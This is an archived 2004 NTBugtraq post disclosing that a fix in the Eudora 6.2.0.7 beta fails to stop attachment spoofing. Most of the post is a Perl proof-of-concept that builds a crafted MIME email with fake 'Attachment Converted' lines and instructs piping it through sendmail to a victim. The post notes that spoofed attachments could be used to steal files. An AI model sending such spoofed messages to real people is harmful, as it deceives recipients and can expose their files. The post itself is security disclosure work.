Eudora 6.2.0.7 attachment spoof

From: Paul Szabo (psz_at_MATHS.USYD.EDU.AU)
Date: 10/11/04

  • Next message: Abe Usher: "MonkeyShell: using XML-RPC for access to a remote shell"
    Date:         Mon, 11 Oct 2004 08:23:53 +1000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Eudora 6.2.0.7 for Windows is in beta testing since 8 Oct 2004. The release
    notes
    http://www.eudora.com/download/eudora/windows/6.2/Betas/RelNotes.txt
    say:

    > SECURITY
    > --------
    > Fixed cases where attachments could be spoofed via base64 or quoted-printable
    > encoded (plain-text, inline) MIME parts.

    Not so. Harmless demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    use MIME::Base64;

    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.2.0.7 on Windows spoof\n";
    print "MIME-Version: 1.0\n";
    print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

    print "--zzz\n";
    print "Content-Type: text/plain\n";
    print "Content-Transfer-Encoding: 7bit\n\n";
    print "With spoofed attachments, we could 'steal' files (after a warning?)
    if the message was forwarded (not replied to).\n";

    print "\n--zzz\n";
    print "Content-Type: text/html; name=\"qp.txt\"\n";
    print "Content-Transfer-Encoding: quoted-printable \n";
    print "Content-Disposition: inline; filename=\"qp.txt\"\n\n";
    print "Within text/html part, use </x-html> to get back to plaintext,
    no need for NUL or linebreak or nothing:
    </x-html>\n";
    print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted=
    : \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";

    print "\n--zzz--\n";

    --
    NTBugtraq Editor's Note:
    Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you'll have to copy their email address out of the message and place it in your TO: field.
    --
    

  • Next message: Abe Usher: "MonkeyShell: using XML-RPC for access to a remote shell"

    Relevant Pages

    • Re: Restoring folder & files Help PLEASE
      ... Don't open attachments. ... Turn off email scanning in your antivirus software. ... Windows 2000 and Windows XP. ... Windows XP Service Pack 2 Resources for IT Professionals ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Outlook Express takes forever to open
      ... Don't open attachments. ... Turn off email scanning in your antivirus software. ... Windows 2000 and Windows XP. ... Windows XP Service Pack 2 Resources for IT Professionals ...
      (microsoft.public.windowsxp.general)
    • Re: Blank message body
      ... then checked for microsoft updates. ... >> then went to the Windows update site and applied all ... Don't open attachments. ... Turn off email scanning in your antivirus software. ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Restoring Local Folders ...
      ... Please start your own thread and do so in the Windows Vista Mail newsgroup. ... This is for Outlook Express. ... Don't open attachments. ... Turn off email scanning in your antivirus software. ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Importing Emails to OE6 after resetting factory settings
      ... Don't open attachments. ... Turn off email scanning in your antivirus software. ... Windows 2000 and Windows XP. ... Windows XP Service Pack 2 Resources for IT Professionals ...
      (microsoft.public.windows.inetexplorer.ie6.outlookexpress)